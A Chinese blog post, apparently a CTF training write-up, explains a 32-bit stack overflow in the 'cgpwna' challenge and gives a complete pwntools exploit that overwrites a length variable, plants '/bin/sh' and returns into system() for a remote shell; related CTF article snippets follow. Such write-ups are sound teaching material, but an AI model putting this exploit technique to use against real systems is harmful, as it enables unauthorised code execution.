pwn暑假训练(六) cgpwna

最新推荐文章于 2020-05-28 09:05:31 发布
原创 最新推荐文章于 2020-05-28 09:05:31 发布 · 378 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

这道题是个32位栈溢出
fget()是一个安全的函数很难溢出

int message()
{
  char s; // [esp+18h] [ebp-30h]

  n = 10;
  puts("you can leave some message here:");
  fgets(A, 60, stdin);
  puts("your name please:");
  fgets(&s, n, stdin);
  return puts("Thank you");
}

这就是漏洞函数我们需要覆盖n来操作下一步的栈溢出
首先我们先看到A在bss段

.bss:0804A064                                         ; __do_global_dtors_aux+14↑w
.bss:0804A065                 align 20h
.bss:0804A080                 public A
.bss:0804A080 ; char A[40]
.bss:0804A080 A               db 28h dup(?)           ; DATA XREF: message+2D↑o
.bss:0804A0A8 ; int n
.bss:0804A0A8 n               dd ?                    ; DATA XREF: message+6↑w
.bss:0804A0A8                                         ; message+4B↑r
.bss:0804A0AC                 align 20h
.bss:0804A0C0                 public choice
.bss:0804A0C0 ; char choice
.bss:0804A0C0 choice          d

看到A是个字符串后它与a定义的bss地址相差40所以我们应该可以覆盖n来造成栈溢出
然后后门函数也给了只是少了/bin/sh我们就输入呗直接上exp:

from pwn import *
p=remote('182.254.217.142',10001)
#p=process('../cgpwna')
elf=ELF('../cgpwna')
bss_addr=0x0804A080
system_addr=0x080483F0
offset=0x30+0x4
payload='a'*40
payload+=p32(80)
payload+="/bin/sh"
p.recvuntil('your choice:')
p.sendline('1')
p.recvuntil('you can leave some message here:')
p.sendline(payload)
p.recvuntil('your name please:')
payload2='a'*offset+p32(system_addr)+"aaaa"+p32(bss_addr+44)
p.sendline(payload2)
p.interactive()

~~pwn好难

搭建一道PWN
Jason_ZhouYetao的博客
08-12 3319
最近接到任务,说要出几个pwn题,所以就去熟悉了一下PWN题的搭建: 第一步,准备一道pwn题的源码 #include<stdio.h> int main() { int a=1; float key=2018.81,input; if (a==2) { printf("input your key:\n"); scanf("%f",&input); ...
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2118
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
cgpwn2 writeup
ditto的博客
01-07 1809
拿到题目检查防护: 简单运行下: 放到ida里看下: hello函数的代码如下: char *hello() { char *v0; // eax signed int v1; // ebx unsigned int v2; // ecx char *v3; // eax char s; // [esp+12h] [ebp-26h] int v6; // [esp+1...
小白pwn之旅之pwnable10
qq_41078843的博客
05-28 254
Pwnable-----Brain Fuck 1.准备 将这两个文件下载到ubuntu. 什么是.so文件? SO文件格式即ELF文件格式,它是Linux下可执行文件,共享库文件和目标文件的统一格式。这个像是一个依赖。 2.分析 还是老样子,我们看看文件属性 1.将bf拖到我们的破解大法IDA pro中 看看main()中的三个函数:puts() ,memset(), fget(). 再联想到题目竟然给出了libc.so 这多次一举的做法明显是让我们通过修改GOT表,从而修改函数。 刚好 m
hackme inndy pwn veryoverflow writeup
charlie_heng的专栏
01-02 606
这次是最后一题了,做完这题一定要去复习!!!!(立了个flag。。。 这题有两种思路做,第一种是return2dl_resolve 第二种是泄漏libc,rop运行system(‘/bin/sh’) 因为想完美一点,所以一开始写的是第一种,写完了,在本地get到shell了,连到服务器,结果不行,一看,栈的地址开头是ff,这个也代表eof。。。不吐槽了,现在来分别说下两种思路是怎么做的 其...
pwn暑假训练() emem这次的测验自己还是太菜
doudoudedi
08-14 786
记一下昨天的测验我直接讲我没过的题目 有system函数没有’bin/sh’只开了nx但gadget少的可怜题目直接给了libc那就不用想了直接找偏移…我同学给的libc偏移不对… Gadgets information ============================================================ 0x00000000004006d2 : pop rbp...
pwn2own2020:通过链接个漏洞通过Safari破坏macOS内核
02-04
通过链接个漏洞通过Safari破坏macOS内核 总览 该存储库包含利用和技术细节,并。 有关更多信息,您还可以查看。 该存储库还包括成功利用。 如何繁殖 在exploits文件夹中使用python3运行HTTP服务器。 $ python3 -m...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.youkuaiyun.com/weixin_41748164/article/details/127874334
Writeup of 黑客攻击(Misc) in WhaleCTF
cossack9989的博客
02-02 1827
题目要求获取Administrator的密码。 身为一个web方向重度残疾的二进制手,做这道题真是走了不少弯路。 比如说之前追踪TCP流在文件里找Administrator找password最后啥有用的也没找着(不是很懂黑客攻击的原理OTZ) 后来发现了inetpub\wwwroot,并且猜测黑客应该是用菜刀来取webshell,首先需要访问服务器,于是过滤HTTP包,去看看这个黑客到底干了
花式栈溢出技巧----partial overwrite
qq_42192672的博客
10-18 1450
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#partial-overwrite                   https://bbs.ichunqiu.com/thread-43627-1-1.html                   https://www.jianshu.com/...
CGCTF
weixin_43225801的博客
10-15 1385
CGCTF 第一题,hello,re。 小端序:高位数据放在高位地址,即输出相反; 大端序:高位数据放在低位地址,输出相同。 strcmp:设这两个字符串为str1,str2, 若str1==str2,则返回零; 若str1<str2,则返回负数; 若str1>str2,则返回正数。 ida:R键转换字符;f5查看伪代码。 第二题 下载后,用记事本打开文件,发现是对func函数的汇编解...
Download~!(南邮CTF)
LANVNAL的博客
02-02 2223
传送门|——————|点那两首歌的链接可以下载,下下来发现星星点灯是不想长大,不想知道不能放==(和题目没关系,下下来只是听歌2333).看源码,发现下载链接<p><a href="download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=" target="_blank">星星点灯</a></p> <p><a href="download.php?url=YnV4a
pwn,获取系统权限,入门题,cyclic
weixin_42072280的博客
05-19 3915
https://blog.youkuaiyun.com/SanOrintea/article/details/82288959 大部分还是按照这个来的,就是关于数前面有多少个字符的时候,这个博客是用cyclic -l来数的,但是我在gdb中运行这个命令的时候显示有错误, 我觉得可能是因为那个博客是pwndbg,我是gdb-peda,所以,我就是列了这200个字符的规律,数了一下,当然按...
基本ROP(一)
热门推荐
Pwnpanda的博客
05-05 1万+
每日一结【第1天】 二进制保护机制:http://www.mamicode.com/info-detail-1990426.html 栈溢出原理:https://ctf-wiki.github.io/ctf-wiki/pwn/stackoverflow/stackoverflow_basic/ ret2text 原理: ret2text即需要我们控制程序执行程序本身已有的的代...
xctf的一道题目(77777)
weixin_30337157的博客
03-12 256
这次比赛我没有参加,这是结束之后才做的题目 题目链接http://47.97.168.223:23333 根据题目信息,我们要update那个points值,那就是有很大可能这道题目是一个sql注入的题目,首先要找到那个points值,随意点一下其他几项 Points值在这里 这里有部分代码 这个不知道是什么 发现了代码,那就是要先看一下代码 可以看到这里传进来了两个参数,一个是fla...
bugkuCTF平台逆向题第一道Easy_vb题解
iqiqiya的博客
12-27 8101
题目地址: http://123.206.31.85/files/6d5c35762f3e316cde9647c14fd0b56d/easy_vb.exe 下载后运行截图 查壳 无壳 直接载入OD 直接反汇编窗口右键à中文搜索引擎à智能搜索即可发现flag  IDA载入查看 发现IDA浏览窗口直接向下翻几下就可以发现
2020 pwn2own挑战:漏洞链攻破macOS内核
总之,Pwn2own2020中通过链接个漏洞攻击Safari并破坏macOS内核的案例,揭示了即便是看似安全的系统也存在潜在的脆弱性。作为安全领域的专业人士,我们应当从这些事件中吸取教训,持续关注新的安全威胁,积极应对并...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值